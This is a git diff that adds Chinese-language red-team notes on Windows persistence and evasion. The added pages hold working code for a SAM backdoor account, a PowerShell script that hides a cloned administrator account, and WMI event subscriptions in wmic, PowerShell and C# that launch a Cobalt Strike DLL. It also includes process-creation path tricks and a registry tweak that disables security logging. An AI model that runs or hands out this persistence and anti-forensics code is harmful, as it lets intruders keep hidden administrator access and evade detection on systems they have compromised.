+ pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
+ pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
+ pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
+ pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
+
+ RtlInitUnicodeString(&UserName, L"Admin");
+ RtlInitUnicodeString(&PassWord, L"Admin");
+
+ Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
+ Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
+ Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
+
+ Status = SamOpenDomain(ServerHandle,
+ DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS,
+ DomainInfo->DomainSid,
+ &DomainHandle);
+
+ Status = SamCreateUser2InDomain(DomainHandle,
+ &UserName,
+ USER_NORMAL_ACCOUNT,
+ USER_ALL_ACCESS | DELETE | WRITE_DAC,
+ &UserHandle,&GrantedAccess,&RelativeId);
+
+ RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
+ uai.NtPasswordPresent = TRUE;
+ uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
+
+
+ Status = SamSetInformationUser(UserHandle,
+ UserAllInformation,
+ &uai);
+
+ return 0;
+}
+```
+
diff --git a/persistence/user/hide-user.md b/persistence/user/hide-user.md
new file mode 100644
index 0000000..05d4319
--- /dev/null
+++ b/persistence/user/hide-user.md
@@ -0,0 +1,158 @@
+# 隐藏用户
+
+原理:
+1.用户名要以$结尾,输入net user无法获取
+2.删除自身账户,再导入克隆的账户注册表,使注册表存在但是查不到账户
+
+Powershell:
+
+```text
+function Create-Clone
+{
+<#
+.SYNOPSIS
+This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
+.PARAMETER u
+The clone username
+.PARAMETER p
+The clone user password
+.PARAMETER cu
+The user to clone, default administrator
+.EXAMPLE
+Create-Clone -u evi1cg -p evi1cg123 -cu administrator
+#>
+ Param(
+ [Parameter(Mandatory=$true)]
+ [String]
+ $u,
+ [Parameter(Mandatory=$true)]
+ [String]
+ $p,
+ [Parameter(Mandatory=$false)]
+ [String]
+ $cu = "administrator"
+ )
+ function upReg{
+ "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini
+ cmd /c "regini $env:temp\up.ini"
+ Remove-Item $env:temp\up.ini
+ }
+ function downreg {
+ "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini
+ cmd /c "regini $env:temp\down.ini"
+ Remove-Item $env:temp\down.ini
+ }
+ function Create-user ([string]$Username,[string]$Password) {
+ $group = "Administrators"
+ $existing = Test-Path -path
"HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
+ if (!$existing) {
+ Write-Host "[*] Creating new local user $Username with password $Password"
+ & NET USER $Username $Password /add /y /expires:never | Out-Null
+ Write-Host "[*] Adding local user $Username to $group."
+ & NET LOCALGROUP $group $Username /add | Out-Null
+ }
+ else {
+ Write-Host "[*] Adding existing user $Username to $group."
+ & NET LOCALGROUP $group $Username /add | Out-Null
+ $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
+ $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
+ Write-Host "[*] Setting password for existing local user $Username"
+ $exist.SetPassword($Password)
+ }
+ Write-Host "[*] Ensuring password for $Username never expires."
+ & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
+ }
+ function GetUser-Key([string]$user)
+ {
+ cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
+ cmd /c "regini $env:temp\$user.ini"
+ Remove-Item $env:temp\$user.ini
+ if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
+ cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
+ $file = Get-Content "$env:temp\$user.reg" | Out-String
+ $pattern="@=hex\((.*?)\)\:"
+ $file -match $pattern |Out-Null
+ $key = "00000"+$matches[1]
+ Write-Host "[!]"$key
+ return $key
+ }else {
+ Write-Host "[-] SomeThing Wrong !"
+ }
+ }
+ function Clone ([string]$ukey,[string]$cukey) {
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
+ "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini
+ cmd /c " regini $env:temp\f.ini"
+ Remove-Item $env:temp\f.ini
+ $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
+ $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
+ Write-Host "[*] Get clone user'F value"
+ $cuFreg = Get-Item -Path $cureg.Trim()
+ $cuFvalue = $cuFreg.GetValue('F')
+ Write-Host "[*] Change user'F value"
+ Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue
+ $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
+ cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
+ }
+ function Main () {
+ if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
+ {
+ Write-Output "Script must be run as administrator"
+ break
+ }
+ Write-Output "[*] Start"
+ Write-Output "[*] Tring to change reg privilege !"
+ upReg
+ if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
+ Write-Host "[-] The User to Clone does not exist !"
+ Write-Output "[*] Change reg privilege back !"
+ downReg
+ Write-Output "[*] Exiting !"
+ }
+ else {
+ if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
+ $tmp = "1"
+ }
+ else{
+ $tmp = "0"
+ }
+ Write-Output "[*] Create User..."
+ Create-user $u $p
+ Write-Output "[*] Get User $u's Key .."
+ $ukey = GetUser-Key $u |Out-String
+ Write-Output "[*] Get User $cu's Key .."
+ $cukey = GetUser-Key $cu |Out-String
+ Write-Output "[*] Clone User.."
+ Clone $ukey $cukey
+ if($tmp -eq 1 ){
+ Write-Output "[*] Delete User.."
+ cmd /c "net User $u /del " |Out-Null
+ }else{ Write-Output "[*] Don't need to delete.."}
+ cmd /c "regedit /s $env:temp\$u.reg"
+ cmd /c "regedit /s $env:temp\out.reg"
+ Remove-Item $env:temp\*.reg
+ Write-Output "[*] Change reg privilege back !"
+ downreg
+ Write-Output "[*] Done"
+ }
+ }
+ Main
+}
+```
+
+参考文章:
+
+{% embed url="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/" caption="" %}
+
+{% embed url="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1" caption="" %}
+
diff --git a/persistence/wmi/README.md b/persistence/wmi/README.md
new file mode 100644
index 0000000..4e74a94
--- /dev/null
+++ b/persistence/wmi/README.md
@@ -0,0 +1,2 @@
+# WMI
+
diff --git a/persistence/wmi/wmi-event.md b/persistence/wmi/wmi-event.md
new file mode 100644
index 0000000..2576abd
--- /dev/null
+++ b/persistence/wmi/wmi-event.md
@@ -0,0 +1,109 @@
+# WMI事件
+
+## WMI事件
+
+WMI事件,是特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。
+
+## 利用代码
+
+命令行:
+
+```text
+#注册一个事件过滤器,该过滤器是开机2分钟到2分半钟,由于是永久WMI事件订阅,故需要管理员权限,最终获取到权限也是system权限
+wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
+#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
+wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
+#绑定事件 过滤器和事件消费者
+wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
+```
+
+Powershell:
+
+```text
+$wmiParams = @{
+ NameSpace = 'root\subscription'
+}
+# Creating a new event filter
+$wmiParams.Class = '__EventFilter'
+$wmiParams.Arguments = @{
+ Name = 'BugSecFilter'
+ EventNamespace = 'root\CIMV2'
+ QueryLanguage = 'WQL'
+ Query = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
+}
+$filterResult = Set-WmiInstance @wmiParams
+# Creating a new consumer
+$wmiParams.Class = 'CommandLineEventConsumer'
+$wmiParams.Arguments = @{
+ Name = 'BugSecConsumer'
+ CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
+}
+$consumerResult = Set-WmiInstance @wmiParams
+# Bind filter to consumer
+$wmiParams.Class = '__FilterToConsumerBinding'
+$wmiParams.Arguments = @{
+ Filter = $filterResult
+ Consumer = $consumerResult
+}
+Set-WmiInstance @wmiParams
+```
+
+C\#:
+
+```csharp
+using System;
+using System.Text;
+using System.Management;
+namespace WMIPersistence
+{
+ class Program
+ {
+ static
void Main(string[] args) + { + PersistWMI(); + } + static void PersistWMI() + { + ManagementObject myEventFilter = null; + ManagementObject myEventConsumer = null; + ManagementObject myBinder = null; + String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"; + String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " + + "WHERE TargetInstance ISA \"Win32_Process\" " + + "AND TargetInstance.Name = \"chrome.exe\""; + try + { + ManagementScope scope = new ManagementScope(@"\\.\root\subscription"); + ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null); + WqlEventQuery myEventQuery = new WqlEventQuery(strQuery); + myEventFilter = wmiEventFilter.CreateInstance(); + myEventFilter["Name"] = "BugSecFilter"; + myEventFilter["Query"] = myEventQuery.QueryString; + myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage; + myEventFilter["EventNameSpace"] = @"\root\cimv2"; + myEventFilter.Put(); + myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance(); + myEventConsumer["Name"] = "BugSecConsumer"; + myEventConsumer["CommandLineTemplate"] = CommandLine; + myEventConsumer.Put(); + myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance(); + myBinder["Filter"] = myEventFilter.Path.RelativePath; + myBinder["Consumer"] = myEventConsumer.Path.RelativePath; + myBinder.Put(); + } + catch (Exception e) + { + Console.WriteLine(e); + } + Console.ReadKey(); + } + } +} +``` + +参考文章: + +{% embed url="https://github.com/AxelPotato/WMI" caption="" %} + +{% embed url="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi" caption="" %} + diff --git a/privilege-escalation/bug.md b/privilege-escalation/bug.md new file mode 100644 index 0000000..04f0e9e --- /dev/null +++ b/privilege-escalation/bug.md @@ -0,0 +1,2 @@ +# 漏洞 + 
diff --git a/privilege-escalation/untitled-4.md b/privilege-escalation/untitled-4.md
new file mode 100644
index 0000000..6d82de4
--- /dev/null
+++ b/privilege-escalation/untitled-4.md
@@ -0,0 +1,2 @@
+# UAC Bypass
+
diff --git a/privilege-escalation/wrong-config.md b/privilege-escalation/wrong-config.md
new file mode 100644
index 0000000..59a4bd6
--- /dev/null
+++ b/privilege-escalation/wrong-config.md
@@ -0,0 +1,2 @@
+# 错误配置
+
diff --git a/process/creat-new-process.md b/process/creat-new-process.md
new file mode 100644
index 0000000..3676bf2
--- /dev/null
+++ b/process/creat-new-process.md
@@ -0,0 +1,12 @@
+# 启动进程
+
+WMI:
+
+```text
+wmic process call create "\\?\UNC\127.0.0.1\C$\windows\system32\calc.exe"
+wmic process call create "\\.\GLOBALROOT\??\UNC\127.0.0.1\C$\windows\system32\calc.exe"
+wmic process call create "\\;lanmanredirector\127.0.0.1\C$\windows\system32\calc.exe"
+wmic process call create "\\.\globalroot\osdataroot\windows\notepad.exe"
+wmic process call create "\\.\global\globalroot\device\mup\;lanmanredirector\.\localhost\c$\\windows\:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data nul..\ /..\..\write.exe"
+```
+
diff --git a/rats/hidden-remote.md b/rats/hidden-remote.md
new file mode 100644
index 0000000..1b8b6de
--- /dev/null
+++ b/rats/hidden-remote.md
@@ -0,0 +1,14 @@
+# Hidden Remote
+
+HVNC:
+
+{% embed url="https://bbs.pediy.com/thread-264956.htm" caption="" %}
+
+HRDP:
+
+{% embed url="https://bbs.pediy.com/thread-265188.htm" caption="" %}
+
+Remote Desktop Shadowing:
+
+{% embed url="https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing" caption="" %}
+
diff --git a/rats/stealer/README.md b/rats/stealer/README.md
new file mode 100644
index 0000000..2129374
--- /dev/null
+++ b/rats/stealer/README.md
@@ -0,0 +1,2 @@
+# Stealer
+
diff --git a/rats/stealer/shu-ru-fa.md b/rats/stealer/shu-ru-fa.md
new file mode 100644
index 0000000..b4394e0
--- /dev/null
+++ b/rats/stealer/shu-ru-fa.md
@@ -0,0 +1,6 @@
+# 输入法
+
+参考链接:
+
+{% embed url="https://www.cnki.com.cn/Article/CJFDTotal-JCJS202005014.htm" caption="" %}
+
diff --git a/tips/some-tips.md b/tips/some-tips.md
new file mode 100644
index 0000000..93c1022
--- /dev/null
+++ b/tips/some-tips.md
@@ -0,0 +1,14 @@
+# 鬼知道有什么用的小知识
+
+Win+Ctrl+Shift+B 重启图形驱动
+
+ShellBrowserWindow创建的进程被any.run标记为用户手动执行
+
+64位系统上的32位杀软有可能扫描不到c:\windows\sysnative下的文件
+
+添加CurrentControlSet\Control\MiniNt,win会认为自己是pe系统,并不再记录安全日志
+
+Win+R 输入”.exe://“ 会重启explorer
+
+echo qwqdanchun>C:\SYSTEM~1\ClientRecoveryPasswordRotation\test.txt\([https://twitter.com/jonasLyk/status/1368259706423230464?s=20](https://twitter.com/jonasLyk/status/1368259706423230464?s=20)\)
+
diff --git a/tools/untitled.md b/tools/untitled.md
new file mode 100644
index 0000000..5094080
--- /dev/null
+++ b/tools/untitled.md
@@ -0,0 +1,2 @@
+# Untitled
+